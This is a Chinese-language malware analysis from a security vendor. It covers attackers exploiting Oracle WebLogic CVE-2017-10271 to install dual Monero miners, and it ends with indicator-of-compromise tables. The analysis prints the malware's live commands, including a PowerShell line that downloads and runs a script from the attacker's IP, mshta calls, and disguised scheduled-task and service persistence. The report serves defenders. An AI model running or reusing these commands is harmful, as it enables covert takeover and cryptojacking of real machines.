加密虛擬貨幣突然爆紅,已經讓資安威脅情勢大為改觀。網路犯罪集團開始調整其人力和資源,將加密虛擬貨幣定為優先要務,包括直接竊取比特幣錢包或入侵網路和裝置並用於挖礦。歹徒看上加密虛擬貨幣其實已不是新聞,勒索病毒駭客集團多年來一直偏愛 比特幣 Bitcoin 為其勒索贖金的管道。不過,趨勢科技從 2017 年 10 月下旬開始在一些行動裝置應用程式商店看到手機挖礦惡意程式,到了 2017 年 12 月,Digmine 加密虛擬貨幣挖礦程式開始藉由社群媒體即時通訊散布。
而現在,駭客正利用一個已經修補的 Oracle WebLogic WLS-WSAT 漏洞 (也就是可讓駭客從遠端執行程式碼的 CVE-2017-10271 漏洞) 來散布兩個加密虛擬貨幣挖礦程式,分別是 64 位元和 32 位元的 XMRig 門羅幣挖礦程式。兩個版本分別對應不同版本的 Windows 作業系統。「圖 1」顯示此漏洞攻擊程式碼仍在開發當中。此份報告所分析的是最新版本的惡意程式。
漏洞攻擊在系統植入兩個挖礦程式
至截稿為止,趨勢科技發現駭客會利用 CVE-2017-10271 漏洞在系統上植入趨勢科技命名為「Coinminer_MALXMR.JL-PS」的挖礦程式。受感染的系統上會有兩個門羅幣挖礦程式。
圖 2:漏洞攻擊在系統上植入挖礦程式 Coinminer_MALXMR.JL-PS。
Coinminer_MALXMR.JL-PS 一旦執行,就會下載三個檔案到系統上:一個挖礦元件「javaupd.exe」(趨勢科技命名為:Coinminer_TOOLXMR.JL-WIN64)、一個開機自動執行元件「startup.cmd」(趨勢科技命名為:Coinminer_MALXMR.JL-BAT) 以及另一個惡意程式「3.exe」(趨勢科技命名為:Coinminer_MALXMR.JLT-WIN32)。
根據我們的分析,駭客會依照 Windows 作業系統的版本而執行不同挖礦程式。第一個挖礦程式是 64 位元程式,因此只會在 64 位元 Windows 上執行。如果在 32 位元的 Windows 系統,則會執行另一個挖礦程式。
雙重對應版本擴大受害裝置數量
感染的過程首先會在系統上安裝一個開機自動執行元件。至截稿為止,其作法是將前述的「startup.cmd」複製到系統的「啟動」(Startup) 資料夾。如此一來,這個 .cmd 檔案就會在系統開機時自動啟動並執行「mshta https://107.181.174.248/web/p.hta」這道指令,進而啟動 Powershell 程式,其完整參數如下:
cmd /c powershell.exe -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString(‘https://107.181.174.248/web/check.ps1’))
惡意程式會在系統上建立兩個不同排程工作:
- 第一個工作會試圖下載挖礦程式,然後不斷重複執行該程式。一個排程工作名為「Oracle Java update」,會執行「Mshta https://107.181.174.248/web/p.hta」這道指令。它每 80 分鐘執行一次,流程跟 startup.cmd 的做法一樣。
- 另一個排程工作名為「Oracle Java」,它每天執行一次,負責中止第一個挖礦程式。它會執行以下指令:
- cmd /c taskkill /im powershell.exe /f
- cmd /c taskkill /im javaupd.exe /f
- cmd /c taskkill /im msta.exe /f (這道指令我們懷疑駭客可能搞錯了,它應該執行「exe」才對)
在產生上述排程工作之後,Coinminer_MALXMR.JL-PS 接著會執行挖礦程式「javaupd.exe」來開始進行挖礦作業,其指令如下:
cmd.exe /c C:\ProgramData\javaupd.exe -o eu.minerpool.pw:65333 -u {Computer Name}
系統的效能會因為挖礦作業而下降。
第二個惡意程式「3.exe」會先檢查系統是 32 位元或 64 位元版本。如果是 32 位元版本,就會下載並執行一個名為「LogonUI.exe」的程式 (趨勢科技命名為 COINMINER_MALXMR.JL-WIN32)。 如果前述第一個 64 位元的挖礦程式未在執行當中,LogonUI.exe 會下載一個 .DLL 檔案 (趨勢科技命名為:COINMINER_MALXMR.FD-WIN32),該檔案接著會執行第二個挖礦程式「sqlservr.exe」(趨勢科技命名為:COINMINER_TOOLXMR.JL-WIN32)。
第二個挖礦程式是專門針對 32 位元 Windows 而設計,當第一個挖礦程式無法執行時,就會執行這個程式。此外,它還具備開機自動啟動功能,而且會建立排程工作讓他每天都會自動執行:
- LogonUI 會註冊成一個系統服務。
- 服務名稱為「Microsoft Telemetry」。
- 它會建立排程工作來每天執行一次「Microsoft Telemetry」服務。
圖 3:挖礦程式執行流程。
挖礦程式通常會盡可能感染越多裝置,因為不論任何加密虛擬貨幣都需要大量的運算資源才能有效開採。藉由雙挖礦程式及開機自動啟動與每日執行一次的機制,駭客就能盡可能擴大感染的裝置數量以利於挖礦。
除此之外,這個挖礦程式還會試圖關閉其他惡意程式來讓它擁有更多運算資源可用。它會中止「spoosvc.exe」程式並刪除「Spooler SubSystem Service」排程工作,這是另一個趨勢科技命名為「TROJ_DLOADR.AUSUHI」的加密虛擬貨幣挖礦程式。
對使用者的影響與反制之道
此惡意程式會利用電腦的中央處理器 (CPU) 和繪圖晶片 (GPU) 來進行挖礦,因此系統會變得異常緩慢。使用者一開始可能不會懷疑自己的電腦是因為感染惡意程式才變慢,因為還有其他因素也會造成系統變慢。不過,正如我們所說,加密虛擬貨幣挖礦惡意程式從 2017 年中期便開始出現,預料往後還會有更多類似的變種出現。網路犯罪集團總是不放過任何機會,並且不斷試驗新的方法來入侵使用者的系統。
定期修補並更新軟體可有效防範加密虛擬貨幣採礦程式及其他專門利用系統漏洞的威脅 (本案例的漏洞早在 2017 年 10 月廠商即已修補)。IT 系統管理員和資安人員也可考慮採用一套應用程式白名單或類似的安全機制,如此可避免一些可疑程式執行或安裝。此外,主動監控網路流量也有助於發現惡意程式的感染徵兆。趨勢科技HYPERLINK “https://www.trendmicro.tw/tw/business/complete-software-protection/index.html” Smart Protection Suites和 Worry-Free Pro皆能保護使用者與企業並偵測及攔截上述惡意檔案與相關網址。趨勢科技HYPERLINK “https://www.trendmicro.tw/tw/business/complete-software-protection/index.html” Smart Protection Suites更具備高準度機器學習、網站信譽評等、行為監控、應用程式控管等功能,可有效防範此一加密虛擬貨幣挖礦程式及其它威脅。
除此之外,趨勢科技 趨勢科技的Deep Discovery Inspector 也可利用以下 DDI 規則來保護客戶:
- DDI Rule ID 2600:CVE-2017-10271 – Oracle Weblogic Exploit – HTTP (Request)
入侵指標資料
| SHA256 雜湊碼 | 趨勢科技命名 |
| 28e9f5d3768cdccbd886b37964f17754c8b1875c588ced775849a0874e8c2375 | Coinminer_MALXMR.FD-WIN64 |
| 4b2f0e3165090121e4029908d552a8c559e1b3ee0bb3e679830b5bf91f0ab796 | Coinminer_MALXMR.JLT-WIN32 |
| 55221771041707c190ddfe322301876a432eb4a5d23888bf150864bcd1c7e709 | Coinminer_MALXMR.FD-WIN32 |
| 7ecee91336977c324d5b74e3900de36a356702acc526f3b684d599f931bde47b | Coinminer_MALXMR.JL-BAT |
| 8a01dc99ac4e197c9c238ad33c3259c1ee124e5f8b5514766af45f29cf299653 | Coinminer_MALXMR.JT-PS |
| 9d08c4c50c8fc0efab2ca749b86292077f51f4a157e6ac02ecacf282c5da28eb | Coinminer_TOOLXMR.JL-WIN32 |
| bab77860c4d7ccbdfc4f546ea348f68ae05c6e18c5a8f88460d09712138f5b88 | Coinminer_MALXMR.JL-PS |
| d3f0b7b903d7879d0ef1c39c423d2a04dfd61f407dc1844446d7395e033c75ab | Coinminer_MALXMR.JL-WIN64 |
| d7cf45c50a201199d5e1c3fca8338ad369ef1e8db9efcb8004210d4f06217e25 | Coinminer_TOOLXMR.JL-WIN64 |
| dc71b4e84d39407892e700bda587abf1c921563aaa3fddd074225f5a1068f8bc | Coinminer_MALXMR.JL-PS |
| e390c72b226c7a6d7443074a9ccd54cf4ccf8acd68eea20da8f8a1dfd57a652d | Coinminer_MALXMR.JL-WIN32 |
| f05721fc5a4686fef1ea1a82a9065f530ce96aaa693bd00088b67d89606de9c4 | Coinminer_TOOLXMR.JL-WIN64 |
| 網址 | 目的 |
| https://107.181.174.248/web/2.ps1 | 漏洞攻擊當中所用到的惡意檔案。 |
| https://107.181.174.248/web/javaupd.exe | 用於下載檔案。 |
| https://107.181.174.248/web/startup.cmd | 用於下載檔案。 |
| https://107.181.174.248/z.exe | 用於下載檔案。 |
| https://107.181.174.248/panelnew/BotLoaderx32.exe | 用於下載檔案。 |
| https://107.181.174.248/panelnew/BotLoaderx64.exe | 用於下載檔案。 |
| https://107.181.174.248/panelnew/MainModulex32.dll | 用於下載檔案。 |
| https://107.181.174.248/panelnew/MainModulex64.dll | 用於下載檔案。 |
| https://107.181.174.248/123/2.exe | 用於下載檔案。 |
| https://107.181.174.248/web/p.hta | 用於開機自動執行。 |
| https://107.181.174.248/web/kil.hta | 用於開機自動執行。 |
| https://107.181.174.248/web/p.hta | 用於開機自動執行。 |
| https://107.181.174.248/web/check.ps1 | 用於開機自動執行。 |
| https://107.181.174.248/web/p.hta | 用於開機自動執行。 |
| https://zxcvb.pw/api/bot/getSettings.php | 用於取得組態設定。 |
| https://107.181.174.248/panelnew/BotLoaderx32.exe | getSettings.php 當中的連結。 |
| https://107.181.174.248/panelnew/BotLoaderx64.exe | getSettings.php 當中的連結。 |
| https://107.181.174.248/panelnew/MainModulex32.dll | getSettings.php 當中的連結。 |
| https://107.181.174.248/panelnew/MainModulex64.dll | getSettings.php 當中的連結。 |
原文出處:Oracle Server Vulnerability Exploited to Deliver Double Monero Miner Payloads 作者:Johnlery Triunfante 和 Mark Vicente